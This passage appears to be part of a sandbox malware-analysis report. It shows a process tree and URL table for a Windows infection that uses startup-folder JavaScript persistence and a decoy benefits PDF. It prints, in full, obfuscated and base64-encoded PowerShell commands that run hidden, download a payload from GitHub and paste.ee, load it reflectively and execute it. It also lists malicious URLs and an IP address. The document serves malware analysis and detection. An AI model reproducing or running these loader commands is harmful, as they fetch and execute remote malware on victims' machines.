= '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t);
CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I,
oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks;
Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe
'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat"
"
|
||
C:\Windows\System32\wscript.exe
|
wscript.exe "C:\Users\Public\Documents\2x_bee.js"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
sj.JJC.js')')
|
||
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js',
'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js',
'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
sj.JJC.js')')
|
||
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD
= [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden
-executionpolicy bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+';
'+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url);
'+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly
'+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+',
{3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+'
{3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34)
)"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js',
'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD
= [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden
-executionpolicy bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s;
CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent
= '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t);
CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I,
oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks;
Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe
'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD
= [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden
-executionpolicy bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s;
CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent
= '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t);
CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I,
oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks;
Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe
'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf"
|
||
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log"
--mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,2238789325032490654,13057371531959611122,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 44 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://raw.gith
|
unknown
|
||
http://paste.ee/d/6
|
unknown
|
||
https://go.microsoft.co
|
unknown
|
||
http://paste.ee/d/6fcuVl6r.dll
|
unknown
|
||
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt
|
unknown
|
||
http://paste.ee/d/6fcuV
|
unknown
|
||
https://paste.ee/d/0Hqnxte
|
unknown
|
||
http://paste.ee/d/0
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://paste.ee/Ne
|
unknown
|
||
https://docs.rs/getrandom#nodejs-es-module-support
|
unknown
|
||
https://analytics.paste.ee
|
unknown
|
||
https://paste.ee/d/6fcuVee/d
|
unknown
|
||
https://paste.ee/d/6fcuVP
|
unknown
|
||
https://rdoge.ru/bee/config.jsonf
|
unknown
|
||
http://172.214.220.82/data/2x_bee.js
|
unknown
|
||
http://paste.ee/
|
unknown
|
||
http://paste.ee/d/0Hqnx
|
unknown
|
||
https://www.google.com
|
unknown
|
||
http://www.w3.
|
unknown
|
||
https://paste.ee:443/d/0Hqnxku
|
unknown
|
||
https://raw.githubusercontent.co
|
unknown
|
||
http://paste.ee/d/0Hqn
|
unknown
|
||
https://paste.ee:443/d/0Hqnxky
|
unknown
|
||
http://172.214.220.82/data/Benefits.pdf
|
unknown
|
||
http://paste.ee/d/6fcuVn
|
unknown
|
||
http://paste.ee/d/0Hqnx2
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://172.214.220.82/data/Benefits.pdfy
|
unknown
|
||
https://paste.ee:443/d/0Hqnxu
|
unknown
|
||
https://cdnjs.cloudflare.com
|
unknown
|
||
https://paste.ee/d/0Hqnxza
|
unknown
|
||
https://cdnjs.cloudflare.com;
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://www.microsoft.pki/
|
unknown
|
||
https://secure.gravatar.com
|
unknown
|
||
https://paste.ee/d/6fcuV
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://paste.ee//a
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://paste.ee/9
|
unknown
|
||
https://www.google.com;
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://paste.ee/d/0Hqnx
|
unknown
|
||
http://www.microsoft.
|
unknown
|
||
https://paste.ee/1
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://paste.ee:443/d/6fcuV
|
unknown
|
||
